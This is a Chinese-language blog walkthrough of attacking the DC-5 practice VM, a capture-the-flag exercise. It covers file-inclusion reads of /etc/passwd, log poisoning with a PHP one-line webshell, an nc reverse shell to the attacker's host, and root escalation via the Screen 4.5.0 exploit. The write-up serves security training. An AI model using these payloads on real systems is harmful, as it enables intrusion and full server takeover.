DC-5靶机渗透测试

DC-5靶机渗透测试

1. 信息收集

1.1 主机扫描

arp-scan -l

image-20230809194926627

1.2 端口扫描

nmap -sS -p- 192.168.188.175

image-20230809194955876

2. 漏洞发现

image-20230809195145625

使用网站的页面功能后,点击打开contact页面的提交留言后,出现改变。原先的2020变为了2018。

image-20230809200041412

并且每刷新一次页面,页面上的值就会发生改变。

image-20230809200213405

直接去访问thankyou.php也是一样的。

image-20230809200854593

查看是否为文件包含漏洞,调用file协议查看一下网站目录,发现能够成功读取目录储存文件。

文件包含漏洞:可以允许攻击者利用未正确验证用户输入的文件路径导致恶意文件的执行或敏感文件的泄露。文件包含漏洞通常发生在Web应用程序中,其中动态地包含文件并且未对用户输入进行充分过滤和验证。攻击者可以利用此漏洞来执行任意的服务器端代码,包括恶意脚本、命令执行、包含敏感文件等。

http://192.168.188.175/thankyou.php?file=/etc/passwd

image-20230809201206709

通过Wappalyzer插件可以知道网站是nginx,nginx日志文件默认放在**/var/log/nginx下,配置文件是/etc/nginx/nginx.conf**。

image-20230809195336964

查看配置文件

http://192.168.188.175/thankyou.php?file=/etc/nginx/nginx.conf

image-20230809202206729

得知日志文件路径为**/var/log/nginx/access.log**。

3. 漏洞利用

3.1 bp上传一句话木马

使用bp抓包然后在日志文件中上传“一句话木马”,使用中国蚁剑进行连接。

浏览器访问路径如下,然后使用bp抓包。

http://192.168.188.175/thankyou.php?file=/var/log/nginx/access.log  # 看日志文件

image-20230809202931991

GET /hello-world! <?php @eval($_REQUEST[cmd])?> HTTP/1.1

image-20230809202851439

3.2 反弹shell

打开虚拟终端,发现当前用户的权限较低

image-20230809203128134

kali中监听一个端口4444

nc -lvp 4444

image-20230809204138795

设置反弹shell

在蚁剑终端执行如下命令

nc -e /bin/bash 192.168.188.157 4444 

解析:

  • -e /bin/bash:是 nc 命令的选项之一。-e 选项后跟随要执行的命令,这里是 /bin/bash/bin/bash 是 Linux 系统中的默认 shell(命令行解释器),它允许用户与操作系统进行交互。
  • 如果目标主机(kali)正在监听4444端口,并且允许连接进来,那么 nc 命令将成功建立 TCP 连接。一旦连接建立成功,目标主机会执行 /bin/bash 命令(默认的交互式 shell),将执行的结果通过网络发送回连接的主机。连接主机会成为一个类似于远程 shell 的环境,可以通过命令和输入输出与目标主机进行交互。

image-20230809203849594

反弹成功

image-20230809203918217

设置python交互

python -c "import pty;pty.spawn('/bin/bash')"

image-20230809204049405

4. 提权

find / -user root -perm -u=s -print 2>/dev/null

image-20230809205146036

searchsploit搜索是否存在漏洞。

searchsploit screen 4.5.0

image-20230809205341328

查看41154.sh的绝对路径

searchsploit -p linux/local/41154.sh

image-20230809205450026

/usr/share/exploitdb/exploits/linux/local/41154.sh

查看文件内容

cat /usr/share/exploitdb/exploits/linux/local/41154.sh

image-20230809210005421

第一步:将上部分的c语言代码另存为libhax.c文件,然后gcc编译:

image-20230809210605837

gcc -fPIC -shared -ldl -o libhax.so libhax.c

image-20230809210956778

第二步:将第二部分的C语言代码写入rootshell.c文件中,并编译成rooshell文件。

image-20230809210717267

gcc -o rootshell /tmp/rootshell.c

image-20230809211051870

第三步:将剩下部分的脚本代码写入到run.sh文件中(文件名自定义),在开头加上**#!/bin/bash**注明执行环境。

image-20230809211243751

最后将run.sh以及编译好的libhax.so和rootshell文件拖入蚁剑。

image-20230810220716800

进到kali的python交互shell里,切换到tmp目录下

image-20230810220838730

运行run.sh,输入bash ./run.sh 提权

image-20230810220853057

查看当前用户权限

image-20230810220903446

进到/root查看flag

image-20230810221247970

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

来日可期x

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值